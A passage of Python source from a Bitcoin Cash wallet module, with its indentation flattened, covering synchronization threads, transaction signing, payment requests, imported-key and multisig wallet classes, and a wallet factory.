def start_threads(self, network):
self.network = network
if self.network:
self.start_pruned_txo_cleaner_thread()
self.prepare_for_verifier()
self.verifier = SPV(self.network, self)
self.synchronizer = Synchronizer(self, network)
finalization_print_error(self.verifier)
finalization_print_error(self.synchronizer)
network.add_jobs([self.verifier, self.synchronizer])
self.cashacct.start(self.network) # start cashacct network-dependent subsystem, network.add_jobs, etc
else:
self.verifier = None
self.synchronizer = None
def stop_threads(self):
if self.network:
# Note: synchronizer and verifier will remove themselves from the
# network thread the next time they run, as a result of the below
# release() calls.
# It is done this way (as opposed to an immediate clean-up here)
# because these objects need to do their clean-up actions in a
# thread-safe fashion from within the thread where they normally
# operate on their data structures.
self.cashacct.stop()
self.synchronizer.release()
self.verifier.release()
self.synchronizer = None
self.verifier = None
self.stop_pruned_txo_cleaner_thread()
# Now no references to the synchronizer or verifier
# remain so they will be GC-ed
self.storage.put('stored_height', self.get_local_height())
self.save_network_state()
def save_network_state(self):
"""Save all the objects which are updated by the network thread. This is called
periodically by the Android app during long synchronizations.
"""
with self.lock:
self.save_addresses()
self.save_transactions()
self.save_verified_tx() # implicit cashacct.save
self.storage.put('frozen_coins', list(self.frozen_coins))
self.save_change_reservations()
self.storage.write()
def start_pruned_txo_cleaner_thread(self):
self.pruned_txo_cleaner_thread = threading.Thread(target=self._clean_pruned_txo_thread, daemon=True, name='clean_pruned_txo_thread')
self.pruned_txo_cleaner_thread.q = queue.Queue()
self.pruned_txo_cleaner_thread.start()
def stop_pruned_txo_cleaner_thread(self):
t = self.pruned_txo_cleaner_thread
self.pruned_txo_cleaner_thread = None # this also signals a stop
if t and t.is_alive():
t.q.put(None) # signal stop
# if the join times out, it's ok. it means the thread was stuck in
# a network call and it will eventually exit.
t.join(timeout=3.0)
def wait_until_synchronized(self, callback=None, *, timeout=None):
tstart = time.time()
def check_timed_out():
if timeout is not None and time.time() - tstart > timeout:
raise TimeoutException()
def wait_for_wallet():
self.set_up_to_date(False)
while not self.is_up_to_date():
if callback:
msg = "%s\n%s %d"%(
_("Please wait..."),
_("Addresses generated:"),
len(self.addresses(True)))
callback(msg)
time.sleep(0.1)
check_timed_out()
def wait_for_network():
while not self.network.is_connected():
if callback:
msg = "%s \n" % (_("Connecting..."))
callback(msg)
time.sleep(0.1)
check_timed_out()
# wait until we are connected, because the user
# might have selected another server
if self.network:
wait_for_network()
wait_for_wallet()
else:
self.synchronize()
def can_export(self):
return not self.is_watching_only() and hasattr(self.keystore, 'get_private_key')
def is_used(self, address):
return self.get_address_history(address) and self.is_empty(address)
def is_empty(self, address):
assert isinstance(address, Address)
return not any(self.get_addr_balance(address))
def address_is_old(self, address, age_limit=2):
age = -1
local_height = self.get_local_height()
for tx_hash, tx_height in self.get_address_history(address):
if tx_height == 0:
tx_age = 0
else:
tx_age = local_height - tx_height + 1
if tx_age > age:
age = tx_age
if age > age_limit:
break # ok, it's old. No need to keep looping.
return age > age_limit
def add_input_info(self, txin):
address = txin['address']
if self.is_mine(address):
txin['type'] = self.get_txin_type(address)
# Bitcoin Cash needs value to sign
received, spent = self.get_addr_io(address)
item = received.get(txin['prevout_hash']+':%d'%txin['prevout_n'])
tx_height, value, is_cb = item
txin['value'] = value
self.add_input_sig_info(txin, address)
def can_sign(self, tx):
if tx.is_complete():
return False
for k in self.get_keystores():
# setup "wallet advice" so Xpub wallets know how to sign 'fd' type tx inputs
# by giving them the sequence number ahead of time
if isinstance(k, BIP32_KeyStore):
for txin in tx.inputs():
for x_pubkey in txin['x_pubkeys']:
_, addr = xpubkey_to_address(x_pubkey)
try:
c, index = self.get_address_index(addr)
except:
continue
if index is not None:
k.set_wallet_advice(addr, [c,index])
if k.can_sign(tx):
return True
return False
def get_input_tx(self, tx_hash):
# First look up an input transaction in the wallet where it
# will likely be. If co-signing a transaction it may not have
# all the input txs, in which case we ask the network.
tx = self.transactions.get(tx_hash)
if not tx and self.network:
request = ('blockchain.transaction.get', [tx_hash])
tx = Transaction(self.network.synchronous_get(request))
return tx
def add_input_values_to_tx(self, tx):
""" add input values to the tx, for signing"""
for txin in tx.inputs():
if 'value' not in txin:
inputtx = self.get_input_tx(txin['prevout_hash'])
if inputtx is not None:
out_zero, out_addr, out_val = inputtx.outputs()[txin['prevout_n']]
txin['value'] = out_val
txin['prev_tx'] = inputtx # may be needed by hardware wallets
def add_hw_info(self, tx):
# add previous tx for hw wallets, if needed and not already there
if any([(isinstance(k, Hardware_KeyStore) and k.can_sign(tx) and k.needs_prevtx()) for k in self.get_keystores()]):
for txin in tx.inputs():
if 'prev_tx' not in txin:
txin['prev_tx'] = self.get_input_tx(txin['prevout_hash'])
# add output info for hw wallets
info = {}
xpubs = self.get_master_public_keys()
for txout in tx.outputs():
_type, addr, amount = txout
if self.is_change(addr):
index = self.get_address_index(addr)
pubkeys = self.get_public_keys(addr)
# sort xpubs using the order of pubkeys
sorted_pubkeys, sorted_xpubs = zip(*sorted(zip(pubkeys, xpubs)))
info[addr] = index, sorted_xpubs, self.m if isinstance(self, Multisig_Wallet) else None, self.txin_type
tx.output_info = info
def sign_transaction(self, tx, password, *, use_cache=False):
""" Sign a transaction, requires password (may be None for password-less
wallets). If `use_cache` is enabled then signing will be much faster.
For transactions with N inputs and M outputs, calculating all sighashes
takes only O(N + M) with the cache, as opposed to O(N^2 + NM) without
the cache.
Warning: If you modify non-signature parts of the transaction
afterwards, do not use `use_cache`! """
if self.is_watching_only():
return
# add input values for signing
self.add_input_values_to_tx(tx)
# hardware wallets require extra info
if any([(isinstance(k, Hardware_KeyStore) and k.can_sign(tx)) for k in self.get_keystores()]):
self.add_hw_info(tx)
# sign
for k in self.get_keystores():
try:
if k.can_sign(tx):
k.sign_transaction(tx, password, use_cache=use_cache)
except UserCancelled:
continue
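# Sketch of the use_cache speedup documented above (tx/password assumed to
# exist); the cache is only safe if the tx is not modified between passes:
# >>> wallet.sign_transaction(tx, password, use_cache=True)  # first signing pass
# >>> wallet.sign_transaction(tx, password, use_cache=True)  # later pass reuses sighash cache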
def get_unused_addresses(self, *, for_change=False, frozen_ok=True):
# fixme: use slots from expired requests
with self.lock:
domain = self.get_receiving_addresses() if not for_change else (self.get_change_addresses() or self.get_receiving_addresses())
return [addr for addr in domain
if not self.get_address_history(addr)
and addr not in self.receive_requests
and (frozen_ok or addr not in self.frozen_addresses)]
def get_unused_address(self, *, for_change=False, frozen_ok=True):
addrs = self.get_unused_addresses(for_change=for_change, frozen_ok=frozen_ok)
if addrs:
return addrs[0]
def get_receiving_address(self, *, frozen_ok=True):
'''Returns a receiving address or None.'''
domain = self.get_unused_addresses(frozen_ok=frozen_ok)
if not domain:
domain = [a for a in self.get_receiving_addresses()
if frozen_ok or a not in self.frozen_addresses]
if domain:
return domain[0]
def get_payment_status(self, address, amount):
local_height = self.get_local_height()
received, sent = self.get_addr_io(address)
l = []
for txo, x in received.items():
h, v, is_cb = x
txid, n = txo.split(':')
info = self.verified_tx.get(txid)
if info:
tx_height, timestamp, pos = info
conf = max(local_height - tx_height + 1, 0)
else:
conf = 0
l.append((conf, v))
vsum = 0
for conf, v in reversed(sorted(l)):
vsum += v
if vsum >= amount:
return True, conf
return False, None
def has_payment_request(self, addr):
''' Returns True iff Address addr has any extant payment requests
(even if expired), False otherwise. '''
assert isinstance(addr, Address)
return bool(self.receive_requests.get(addr))
def get_payment_request(self, addr, config):
assert isinstance(addr, Address)
r = self.receive_requests.get(addr)
if not r:
return
out = copy.copy(r)
addr_text = addr.to_ui_string()
amount_text = format_satoshis(r['amount'])
out['URI'] = '{}:{}?amount={}'.format(networks.net.CASHADDR_PREFIX,
addr_text, amount_text)
status, conf = self.get_request_status(addr)
out['status'] = status
if conf is not None:
out['confirmations'] = conf
# check if bip70 file exists
rdir = config.get('requests_dir')
if rdir:
key = out.get('id', addr.to_storage_string())
path = os.path.join(rdir, 'req', key[0], key[1], key)
if os.path.exists(path):
baseurl = 'file://' + rdir
rewrite = config.get('url_rewrite')
if rewrite:
baseurl = baseurl.replace(*rewrite)
out['request_url'] = os.path.join(baseurl, 'req', key[0], key[1], key, key)
out['URI'] += '&r=' + out['request_url']
if 'index_url' not in out:
out['index_url'] = os.path.join(baseurl, 'index.html') + '?id=' + key
websocket_server_announce = config.get('websocket_server_announce')
if websocket_server_announce:
out['websocket_server'] = websocket_server_announce
else:
out['websocket_server'] = config.get('websocket_server', 'localhost')
websocket_port_announce = config.get('websocket_port_announce')
if websocket_port_announce:
out['websocket_port'] = websocket_port_announce
else:
out['websocket_port'] = config.get('websocket_port', 9999)
return out
def get_request_status(self, key):
r = self.receive_requests.get(key)
if r is None:
return PR_UNKNOWN
address = r['address']
amount = r.get('amount')
timestamp = r.get('time', 0)
if timestamp and not isinstance(timestamp, int):
timestamp = 0
expiration = r.get('exp')
if expiration and not isinstance(expiration, int):
expiration = 0
conf = None
if amount:
paid, conf = self.get_payment_status(address, amount)
if not paid:
status = PR_UNPAID
elif conf == 0:
status = PR_UNCONFIRMED
else:
status = PR_PAID
if status == PR_UNPAID and expiration is not None and time.time() > timestamp + expiration:
status = PR_EXPIRED
else:
status = PR_UNKNOWN
return status, conf
def make_payment_request(self, addr, amount, message, expiration=None, *,
op_return=None, op_return_raw=None, payment_url=None, index_url=None):
assert isinstance(addr, Address)
if op_return and op_return_raw:
raise ValueError("both op_return and op_return_raw cannot be specified as arguments to make_payment_request")
timestamp = int(time.time())
_id = bh2u(Hash(addr.to_storage_string() + "%d" % timestamp))[0:10]
d = {
'time': timestamp,
'amount': amount,
'exp': expiration,
'address': addr,
'memo': message,
'id': _id
}
if payment_url:
d['payment_url'] = payment_url + "/" + _id
if index_url:
d['index_url'] = index_url + "/" + _id
if op_return:
d['op_return'] = op_return
if op_return_raw:
d['op_return_raw'] = op_return_raw
return d
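# Hypothetical end-to-end flow for the request helpers above (amount in sats):
# >>> req = wallet.make_payment_request(addr, 10000, 'invoice #1', expiration=3600)
# >>> wallet.add_payment_request(req, config)
# >>> wallet.get_request_status(addr)  # -> (PR_UNPAID, None) until paid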
def serialize_request(self, r):
result = r.copy()
result['address'] = r['address'].to_storage_string()
return result
def save_payment_requests(self, write=True):
def delete_address(value):
del value['address']
return value
requests = {addr.to_storage_string() : delete_address(value.copy())
for addr, value in self.receive_requests.items()}
self.storage.put('payment_requests', requests)
self.save_labels() # In case address labels were set or cleared.
if write:
self.storage.write()
def sign_payment_request(self, key, alias, alias_addr, password):
req = self.receive_requests.get(key)
alias_privkey = self.export_private_key(alias_addr, password)
pr = paymentrequest.make_unsigned_request(req)
paymentrequest.sign_request_with_alias(pr, alias, alias_privkey)
req['name'] = to_string(pr.pki_data)
req['sig'] = bh2u(pr.signature)
self.receive_requests[key] = req
self.save_payment_requests()
def add_payment_request(self, req, config, set_address_label=True, save=True):
addr = req['address']
addr_text = addr.to_storage_string()
amount = req['amount']
message = req['memo']
self.receive_requests[addr] = req
if save:
self.save_payment_requests()
if set_address_label:
self.set_label(addr_text, message, save=save) # should be a default label
rdir = config.get('requests_dir')
if rdir and amount is not None:
key = req.get('id', addr_text)
pr = paymentrequest.make_request(config, req)
path = os.path.join(rdir, 'req', key[0], key[1], key)
if not os.path.exists(path):
try:
os.makedirs(path)
except OSError as exc:
if exc.errno != errno.EEXIST:
raise
with open(os.path.join(path, key), 'wb') as f:
f.write(pr.SerializeToString())
# reload
req = self.get_payment_request(addr, config)
req['address'] = req['address'].to_ui_string()
with open(os.path.join(path, key + '.json'), 'w', encoding='utf-8') as f:
f.write(json.dumps(req))
def remove_payment_request(self, addr, config, clear_address_label_if_no_tx=True,
save=True):
if isinstance(addr, str):
addr = Address.from_string(addr)
if addr not in self.receive_requests:
return False
r = self.receive_requests.pop(addr)
if clear_address_label_if_no_tx and not self.get_address_history(addr):
memo = r.get('memo')
# clear it only if the user didn't overwrite it with something else
if memo and memo == self.labels.get(addr.to_storage_string()):
self.set_label(addr, None, save=save)
rdir = config.get('requests_dir')
if rdir:
key = r.get('id', addr.to_storage_string())
for s in ['.json', '']:
n = os.path.join(rdir, 'req', key[0], key[1], key, key + s)
if os.path.exists(n):
os.unlink(n)
if save:
self.save_payment_requests()
return True
def get_sorted_requests(self, config):
m = map(lambda x: self.get_payment_request(x, config), self.receive_requests.keys())
try:
def f(x):
addr = None # ensure bound even if the lookup below raises
try:
addr = x['address']
return self.get_address_index(addr) or addr
except:
return addr
return sorted(m, key=f)
except TypeError:
# See issue #1231 -- can get inhomogenous results in the above
# sorting function due to the 'or addr' possible return.
# This can happen if addresses for some reason drop out of wallet
# while, say, the history rescan is running and it can't yet find
# an address index for an address. In that case we will
# return an unsorted list to the caller.
return list(m)
def get_fingerprint(self):
raise NotImplementedError()
def can_import_privkey(self):
return False
def can_import_address(self):
return False
def can_delete_address(self):
return False
def is_multisig(self):
# Subclass Multisig_Wallet overrides this
return False
def is_hardware(self):
return any([isinstance(k, Hardware_KeyStore) for k in self.get_keystores()])
def add_address(self, address):
assert isinstance(address, Address)
self._addr_bal_cache.pop(address, None) # paranoia, not really necessary -- just want to maintain the invariant that when we modify address history below we invalidate cache.
self.invalidate_address_set_cache()
if address not in self._history:
self._history[address] = []
if self.synchronizer:
self.synchronizer.add(address)
self.cashacct.on_address_addition(address)
def has_password(self):
return self.storage.get('use_encryption', False)
def check_password(self, password):
self.keystore.check_password(password)
def sign_message(self, address, message, password):
index = self.get_address_index(address)
return self.keystore.sign_message(index, message, password)
def decrypt_message(self, pubkey, message, password):
addr = self.pubkeys_to_address(pubkey)
index = self.get_address_index(addr)
return self.keystore.decrypt_message(index, message, password)
def rebuild_history(self):
''' This is an advanced function for use in the GUI when the user
wants to resynch the whole wallet from scratch, preserving labels
and contacts. '''
if not self.network or not self.network.is_connected():
raise RuntimeError('Refusing to rebuild wallet without a valid server connection!')
if not self.synchronizer or not self.verifier:
raise RuntimeError('Refusing to rebuild a stopped wallet!')
network = self.network
self.stop_threads()
do_addr_save = False
with self.lock:
self.transactions.clear(); self.unverified_tx.clear(); self.verified_tx.clear()
self.clear_history()
if isinstance(self, Standard_Wallet):
# reset the address list to default too, just in case. New synchronizer will pick up the addresses again.
self.receiving_addresses, self.change_addresses = self.receiving_addresses[:self.gap_limit], self.change_addresses[:self.gap_limit_for_change]
do_addr_save = True
self.change_reserved.clear()
self.change_reserved_default.clear()
self.change_unreserved.clear()
self.change_reserved_tmp.clear()
self.invalidate_address_set_cache()
if do_addr_save:
self.save_addresses()
self.save_transactions()
self.save_change_reservations()
self.save_verified_tx() # implicit cashacct.save
self.storage.write()
self.start_threads(network)
self.network.trigger_callback('wallet_updated', self)
def is_schnorr_possible(self, reason: list = None) -> bool:
''' Returns True if this wallet type is compatible.
`reason` is an optional list where you would like a translated string
of why Schnorr isn't possible placed (on False return). '''
ok = bool(not self.is_multisig() and not self.is_hardware())
if not ok and isinstance(reason, list):
reason.insert(0, _('Schnorr signatures are disabled for this wallet type.'))
return ok
def is_schnorr_enabled(self) -> bool:
''' Returns whether schnorr is enabled AND possible for this wallet.
Schnorr is enabled per-wallet. '''
if not self.is_schnorr_possible():
# Short-circuit out of here -- it's not even possible with this
# wallet type.
return False
ss_cfg = self.storage.get('sign_schnorr', None)
if ss_cfg is None:
# Schnorr was not set in config; figure out intelligent defaults,
# preferring Schnorr if it's at least as fast as ECDSA (based on
# which libs user has installed). Note for watching-only we default
# to off if unspecified regardless, to not break compatibility
# with air-gapped signing systems that have older EC installed
# on the signing system. This is to avoid underpaying fees if
# signing system doesn't use Schnorr. We can turn on default
# Schnorr on watching-only sometime in the future after enough
# time has passed that air-gapped systems are unlikely to not
# have Schnorr enabled by default.
# TO DO: Finish refactor of txn serialized format to handle this
# case better!
if (not self.is_watching_only()
and (schnorr.has_fast_sign()
or not ecc_fast.is_using_fast_ecc())):
# Prefer Schnorr, all things being equal.
# - If not watching-only & schnorr possible AND
# - Either Schnorr is fast sign (native, ABC's secp256k1),
# so use it by default
# - Or both ECDSA & Schnorr are slow (non-native);
# so use Schnorr in that case as well
ss_cfg = 2
else:
# This branch is reached if Schnorr is slow but ECDSA is fast
# (core's secp256k1 lib was found which lacks Schnorr) -- so we
# default it to off. Also if watching only we default off.
ss_cfg = 0
return bool(ss_cfg)
def set_schnorr_enabled(self, b: bool):
''' Enable schnorr for this wallet. Note that if Schnorr is not possible,
(due to missing libs or invalid wallet type) is_schnorr_enabled() will
still return False after calling this function with a True argument. '''
# Note: we will have '1' at some point in the future which will mean:
# 'ask me per tx', so for now True -> 2.
self.storage.put('sign_schnorr', 2 if b else 0)
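# Illustrative toggle; note that is_schnorr_enabled() may still report
# False afterwards if Schnorr is impossible for this wallet type:
# >>> wallet.set_schnorr_enabled(True)
# >>> reasons = []
# >>> if not wallet.is_schnorr_possible(reasons):
# ...     print(reasons[0])  # translated explanation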
class Simple_Wallet(Abstract_Wallet):
# wallet with a single keystore
def get_keystore(self):
return self.keystore
def get_keystores(self):
return [self.keystore]
def is_watching_only(self):
return self.keystore.is_watching_only()
def can_change_password(self):
return self.keystore.can_change_password()
def update_password(self, old_pw, new_pw, encrypt=False):
if old_pw is None and self.has_password():
raise InvalidPassword()
if self.keystore is not None and self.keystore.can_change_password():
self.keystore.update_password(old_pw, new_pw)
self.save_keystore()
self.storage.set_password(new_pw, encrypt)
self.storage.write()
def save_keystore(self):
self.storage.put('keystore', self.keystore.dump())
class ImportedWalletBase(Simple_Wallet):
txin_type = 'p2pkh'
def get_txin_type(self, address):
return self.txin_type
def can_delete_address(self):
return len(self.get_addresses()) > 1 # Cannot delete the last address
def has_seed(self):
return False
def is_deterministic(self):
return False
def is_change(self, address):
return False
def get_master_public_keys(self):
return []
def is_beyond_limit(self, address, is_change):
return False
def get_fingerprint(self):
return ''
def get_receiving_addresses(self):
return self.get_addresses()
def delete_address(self, address):
assert isinstance(address, Address)
all_addrs = self.get_addresses()
if len(all_addrs) <= 1 or address not in all_addrs:
return
del all_addrs
transactions_to_remove = set() # only referred to by this address
transactions_new = set() # txs that are not only referred to by address
with self.lock:
for addr, details in self._history.items():
if addr == address:
for tx_hash, height in details:
transactions_to_remove.add(tx_hash)
self.tx_addr_hist[tx_hash].discard(address)
if not self.tx_addr_hist.get(tx_hash):
self.tx_addr_hist.pop(tx_hash, None)
else:
for tx_hash, height in details:
transactions_new.add(tx_hash)
transactions_to_remove -= transactions_new
self._history.pop(address, None)
for tx_hash in transactions_to_remove:
self.remove_transaction(tx_hash)
self.tx_fees.pop(tx_hash, None)
self.verified_tx.pop(tx_hash, None)
self.unverified_tx.pop(tx_hash, None)
self.transactions.pop(tx_hash, None)
self._addr_bal_cache.pop(address, None) # not strictly necessary, above calls also have this side-effect. but here to be safe. :)
if self.verifier:
# TX is now gone. Toss its SPV proof in case we have it
# in memory. This allows user to re-add PK again and it
# will avoid the situation where the UI says "not verified"
# erroneously!
self.verifier.remove_spv_proof_for_tx(tx_hash)
# FIXME: what about pruned_txo?
self.storage.put('verified_tx3', self.verified_tx)
self.save_transactions()
self.set_label(address, None)
self.remove_payment_request(address, {})
self.set_frozen_state([address], False)
self.delete_address_derived(address)
self.cashacct.on_address_deletion(address)
self.cashacct.save()
self.save_addresses()
self.storage.write() # no-op if above already wrote
class ImportedAddressWallet(ImportedWalletBase):
# Watch-only wallet of imported addresses
wallet_type = 'imported_addr'
def __init__(self, storage):
self._sorted = None
super().__init__(storage)
@classmethod
def from_text(cls, storage, text):
wallet = cls(storage)
for address in text.split():
wallet.import_address(Address.from_string(address))
return wallet
def is_watching_only(self):
return True
def get_keystores(self):
return []
def can_import_privkey(self):
return False
def load_keystore(self):
self.keystore = None
def save_keystore(self):
pass
def load_addresses(self):
addresses = self.storage.get('addresses', [])
self.addresses = [Address.from_string(addr) for addr in addresses]
def save_addresses(self):
self.storage.put('addresses', [addr.to_storage_string()
for addr in self.addresses])
self.storage.write()
def can_change_password(self):
return False
def can_import_address(self):
return True
def get_addresses(self, include_change=False):
if not self._sorted:
self._sorted = sorted(self.addresses,
key=lambda addr: addr.to_ui_string())
return self._sorted
def import_address(self, address):
assert isinstance(address, Address)
if address in self.addresses:
return False
self.addresses.append(address)
self.add_address(address)
self.cashacct.save()
self.save_addresses()
self.storage.write() # no-op if already wrote in previous call
self._sorted = None
return True
def delete_address_derived(self, address):
self.addresses.remove(address)
self._sorted.remove(address)
def add_input_sig_info(self, txin, address):
x_pubkey = 'fd' + address.to_script_hex()
txin['x_pubkeys'] = [x_pubkey]
txin['signatures'] = [None]
class ImportedPrivkeyWallet(ImportedWalletBase):
# wallet made of imported private keys
wallet_type = 'imported_privkey'
def __init__(self, storage):
Abstract_Wallet.__init__(self, storage)
@classmethod
def from_text(cls, storage, text, password=None):
wallet = cls(storage)
storage.put('use_encryption', bool(password))
for privkey in text.split():
wallet.import_private_key(privkey, password)
return wallet
def is_watching_only(self):
return False
def get_keystores(self):
return [self.keystore]
def can_import_privkey(self):
return True
def load_keystore(self):
if self.storage.get('keystore'):
self.keystore = load_keystore(self.storage, 'keystore')
else:
self.keystore = Imported_KeyStore({})
def save_keystore(self):
self.storage.put('keystore', self.keystore.dump())
def load_addresses(self):
pass
def save_addresses(self):
pass
def can_change_password(self):
return True
def can_import_address(self):
return False
def get_addresses(self, include_change=False):
return self.keystore.get_addresses()
def delete_address_derived(self, address):
self.keystore.remove_address(address)
self.save_keystore()
def get_address_index(self, address):
return self.get_public_key(address)
def get_public_key(self, address):
return self.keystore.address_to_pubkey(address)
def import_private_key(self, sec, pw):
pubkey = self.keystore.import_privkey(sec, pw)
self.save_keystore()
self.add_address(pubkey.address)
self.cashacct.save()
self.save_addresses()
self.storage.write() # no-op if above already wrote
return pubkey.address.to_ui_string()
def export_private_key(self, address, password):
'''Returned in WIF format.'''
pubkey = self.keystore.address_to_pubkey(address)
return self.keystore.export_private_key(pubkey, password)
def add_input_sig_info(self, txin, address):
assert txin['type'] == 'p2pkh'
pubkey = self.keystore.address_to_pubkey(address)
txin['num_sig'] = 1
txin['x_pubkeys'] = [pubkey.to_ui_string()]
txin['signatures'] = [None]
def pubkeys_to_address(self, pubkey):
pubkey = PublicKey.from_string(pubkey)
if pubkey in self.keystore.keypairs:
return pubkey.address
class Deterministic_Wallet(Abstract_Wallet):
def __init__(self, storage):
Abstract_Wallet.__init__(self, storage)
self.gap_limit = storage.get('gap_limit', 20)
def has_seed(self):
return self.keystore.has_seed()
def get_receiving_addresses(self):
return self.receiving_addresses
def get_change_addresses(self):
return self.change_addresses
def get_seed(self, password):
return self.keystore.get_seed(password)
def add_seed(self, seed, pw):
self.keystore.add_seed(seed, pw)
def change_gap_limit(self, value):
'''This method is not called in the code, it is kept for console use'''
with self.lock:
if value >= self.gap_limit:
self.gap_limit = value
self.storage.put('gap_limit', self.gap_limit)
return True
elif value >= self.min_acceptable_gap():
addresses = self.get_receiving_addresses()
k = self.num_unused_trailing_addresses(addresses)
n = len(addresses) - k + value
self.receiving_addresses = self.receiving_addresses[0:n]
self.gap_limit = value
self.storage.put('gap_limit', self.gap_limit)
self.save_addresses()
return True
else:
return False
def num_unused_trailing_addresses(self, addresses):
'''This method isn't called anywhere. Perhaps it is here for console use.
Can't be sure. -Calin '''
with self.lock:
k = 0
for addr in reversed(addresses):
if addr in self._history:
break
k = k + 1
return k
def min_acceptable_gap(self):
''' Caller needs to hold self.lock otherwise bad things may happen. '''
# fixme: this assumes wallet is synchronized
n = 0
nmax = 0
addresses = self.get_receiving_addresses()
k = self.num_unused_trailing_addresses(addresses)
for a in addresses[0:-k]:
if a in self._history:
n = 0
else:
n += 1
if n > nmax: nmax = n
return nmax + 1
def create_new_address(self, for_change=False, save=True):
for_change = bool(for_change)
with self.lock:
addr_list = self.change_addresses if for_change else self.receiving_addresses
n = len(addr_list)
x = self.derive_pubkeys(for_change, n)
address = self.pubkeys_to_address(x)
addr_list.append(address)
if save:
self.save_addresses()
self.add_address(address)
return address
def synchronize_sequence(self, for_change):
limit = self.gap_limit_for_change if for_change else self.gap_limit
while True:
addresses = self.get_change_addresses() if for_change else self.get_receiving_addresses()
if len(addresses) < limit:
self.create_new_address(for_change, save=False)
continue
if all(map(lambda a: not self.address_is_old(a), addresses[-limit:] )):
break
else:
self.create_new_address(for_change, save=False)
def synchronize(self):
with self.lock:
self.synchronize_sequence(False)
self.synchronize_sequence(True)
def is_beyond_limit(self, address, is_change):
with self.lock:
if is_change:
addr_list = self.get_change_addresses()
limit = self.gap_limit_for_change
else:
addr_list = self.get_receiving_addresses()
limit = self.gap_limit
idx = addr_list.index(address)
if idx < limit:
return False
for addr in addr_list[-limit:]:
if addr in self._history:
return False
return True
def get_master_public_keys(self):
return [self.get_master_public_key()]
def get_fingerprint(self):
return self.get_master_public_key()
def get_txin_type(self, address):
return self.txin_type
class Simple_Deterministic_Wallet(Simple_Wallet, Deterministic_Wallet):
""" Deterministic Wallet with a single pubkey per address """
def __init__(self, storage):
Deterministic_Wallet.__init__(self, storage)
def get_public_key(self, address):
sequence = self.get_address_index(address)
pubkey = self.get_pubkey(*sequence)
return pubkey
def load_keystore(self):
self.keystore = load_keystore(self.storage, 'keystore')
try:
xtype = bitcoin.xpub_type(self.keystore.xpub)
except:
xtype = 'standard'
self.txin_type = 'p2pkh' if xtype == 'standard' else xtype
def get_pubkey(self, c, i):
return self.derive_pubkeys(c, i)
def get_public_keys(self, address):
return [self.get_public_key(address)]
def add_input_sig_info(self, txin, address):
derivation = self.get_address_index(address)
x_pubkey = self.keystore.get_xpubkey(*derivation)
txin['x_pubkeys'] = [x_pubkey]
txin['signatures'] = [None]
txin['num_sig'] = 1
def get_master_public_key(self):
return self.keystore.get_master_public_key()
def derive_pubkeys(self, c, i):
return self.keystore.derive_pubkey(c, i)
class Standard_Wallet(Simple_Deterministic_Wallet):
wallet_type = 'standard'
def pubkeys_to_address(self, pubkey):
return Address.from_pubkey(pubkey)
class Multisig_Wallet(Deterministic_Wallet):
# generic m of n
gap_limit = 20
def __init__(self, storage):
self.wallet_type = storage.get('wallet_type')
self.m, self.n = multisig_type(self.wallet_type)
Deterministic_Wallet.__init__(self, storage)
def get_pubkeys(self, c, i):
return self.derive_pubkeys(c, i)
def pubkeys_to_address(self, pubkeys):
pubkeys = [bytes.fromhex(pubkey) for pubkey in pubkeys]
redeem_script = self.pubkeys_to_redeem_script(pubkeys)
return Address.from_multisig_script(redeem_script)
def pubkeys_to_redeem_script(self, pubkeys):
return Script.multisig_script(self.m, sorted(pubkeys))
def derive_pubkeys(self, c, i):
return [k.derive_pubkey(c, i) for k in self.get_keystores()]
def load_keystore(self):
self.keystores = {}
for i in range(self.n):
name = 'x%d/'%(i+1)
self.keystores[name] = load_keystore(self.storage, name)
self.keystore = self.keystores['x1/']
xtype = bitcoin.xpub_type(self.keystore.xpub)
self.txin_type = 'p2sh' if xtype == 'standard' else xtype
def save_keystore(self):
for name, k in self.keystores.items():
self.storage.put(name, k.dump())
def get_keystore(self):
return self.keystores.get('x1/')
def get_keystores(self):
return [self.keystores[i] for i in sorted(self.keystores.keys())]
def update_password(self, old_pw, new_pw, encrypt=False):
if old_pw is None and self.has_password():
raise InvalidPassword()
for name, keystore in self.keystores.items():
if keystore.can_change_password():
keystore.update_password(old_pw, new_pw)
self.storage.put(name, keystore.dump())
self.storage.set_password(new_pw, encrypt)
self.storage.write()
def has_seed(self):
return self.keystore.has_seed()
def can_change_password(self):
return self.keystore.can_change_password()
def is_watching_only(self):
return all(k.is_watching_only() for k in self.get_keystores())
def get_master_public_key(self):
return self.keystore.get_master_public_key()
def get_master_public_keys(self):
return [k.get_master_public_key() for k in self.get_keystores()]
def get_fingerprint(self):
return ''.join(sorted(self.get_master_public_keys()))
def add_input_sig_info(self, txin, address):
# x_pubkeys are not sorted here because it would be too slow
# they are sorted in transaction.get_sorted_pubkeys
derivation = self.get_address_index(address)
txin['x_pubkeys'] = [k.get_xpubkey(*derivation) for k in self.get_keystores()]
txin['pubkeys'] = None
# we need n place holders
txin['signatures'] = [None] * self.n
txin['num_sig'] = self.m
def is_multisig(self):
return True
wallet_types = ['standard', 'multisig', 'imported']
def register_wallet_type(category):
wallet_types.append(category)
wallet_constructors = {
'standard': Standard_Wallet,
'old': Standard_Wallet,
'xpub': Standard_Wallet,
'imported_privkey': ImportedPrivkeyWallet,
'imported_addr': ImportedAddressWallet,
}
def register_constructor(wallet_type, constructor):
wallet_constructors[wallet_type] = constructor
class UnknownWalletType(RuntimeError):
''' Raised if encountering an unknown wallet type '''
pass
# former WalletFactory
class Wallet:
"""The main wallet "entry point".
This class is actually a factory that will return a wallet of the correct
type when passed a WalletStorage instance."""
def __new__(self, storage):
wallet_type = storage.get('wallet_type')
WalletClass = Wallet.wallet_class(wallet_type)
wallet = WalletClass(storage)
# Convert hardware wallets restored with older versions of
# Electrum to BIP44 wallets. A hardware wallet does not have
# a seed and plugins do not need to handle having one.
rwc = getattr(wallet, 'restore_wallet_class', None)
if rwc and storage.get('seed', ''):
storage.print_error("converting wallet type to " + rwc.wallet_type)
storage.put('wallet_type', rwc.wallet_type)
wallet = rwc(storage)
return wallet
@staticmethod
def wallet_class(wallet_type):
if multisig_type(wallet_type):
return Multisig_Wallet
if wallet_type in wallet_constructors:
return wallet_constructors[wallet_type]
raise UnknownWalletType("Unknown wallet type: " + str(wallet_type))
def create_new_wallet(*, path, config, passphrase=None, password=None,
encrypt_file=True, seed_type=None, gap_limit=None) -> dict:
"""Create a new wallet"""
storage = WalletStorage(path)
if storage.file_exists():
raise Exception("Remove the existing wallet first!")
from .mnemonic import Mnemonic_Electrum, Mnemonic
if seed_type == 'electrum':
seed = Mnemonic_Electrum('en').make_seed()
else:
seed = Mnemonic('en').make_seed()
k = keystore.from_seed(seed, passphrase, seed_type = seed_type)
storage.put('keystore', k.dump())
storage.put('wallet_type', 'standard')
